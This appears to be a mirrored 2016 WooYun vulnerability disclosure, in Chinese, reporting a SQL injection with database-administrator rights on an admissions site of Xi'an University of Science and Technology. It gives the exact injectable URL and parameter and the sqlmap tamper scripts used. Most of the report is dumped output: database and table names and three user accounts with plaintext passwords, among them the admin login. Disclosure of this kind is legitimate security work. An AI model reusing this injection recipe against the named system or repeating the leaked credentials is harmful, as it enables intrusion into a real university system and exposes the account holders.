乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-17: 细节已通知厂商并且等待厂商处理中 2016-01-22: 厂商已经确认,细节仅向厂商公开 2016-02-01: 细节向核心白帽子及相关领域专家公开 2016-02-11: 细节向普通白帽子公开 2016-02-21: 细节向实习白帽子公开 2016-03-06: 细节向公众公开
西安科技大学某站存在SQL注入dba权限
注入点:http://zs.xust.edu.cn/searchys.jsp?years=2013
使用脚本:charencode.py,apostrophemask.py
available databases [25]:[*] CTXSYS[*] HR[*] KJDX[*] MDSYS[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS[*] XDBDatabase: KJDX[35 tables]+-------------------+| PICTURE || QQ_TB_TMP || SYS_FUNC || SYS_JB || SYS_LINK || SYS_MODULE || SYS_ROLEAUTHORITY || SYS_USER || SYS_USERAUTHORITY || TD_SCHOOLLINK || T_CITY || T_COLL || T_FILE || T_INFO || T_INFOTYPE || T_KFCX || T_LYZX || T_PIC || T_PICTYPE || T_SPE || T_ZSJH || T_ZSJH_TEMP || T_ZSQK || T_ZSYS || ZS_LYDQDM || ZS_TD_KLDM || ZS_TD_KSLBDM || ZS_TD_MZDM || ZS_TD_PCDM || ZS_TD_WYYZDM || ZS_TD_XBDM || ZS_TD_ZZMMDM || ZS_T_JHK || ZS_T_TDD || ZS_XYZYDMB |+-------------------+Database: KJDXTable: SYS_USER[5 columns]+-----------+----------+| Column | Type |+-----------+----------+| ID | NUMBER || LOGINNAME | VARCHAR2 || NAME | VARCHAR2 || PASSWORD | VARCHAR2 || YHJB | NUMBER |+-----------+----------+Database: KJDXTable: SYS_USER[3 entries]+-----+---------+------+------------+-----------+| ID | NAME | YHJB | PASSWORD | LOGINNAME |+-----+---------+------+------------+-----------+| 1 | <blank> | 0 | xustzsbps | admin || 65 | lzp | 1 | n1sh1shu1a | lzp || 127 | ad | 2 | 159357as | zzz |+-----+---------+------+------------+-----------+
dba权限
速度太慢不在深入测试!
过滤
危害等级:高
漏洞Rank:20
确认时间:2016-01-22 09:06
感谢提供漏洞信息!非常感谢!
暂无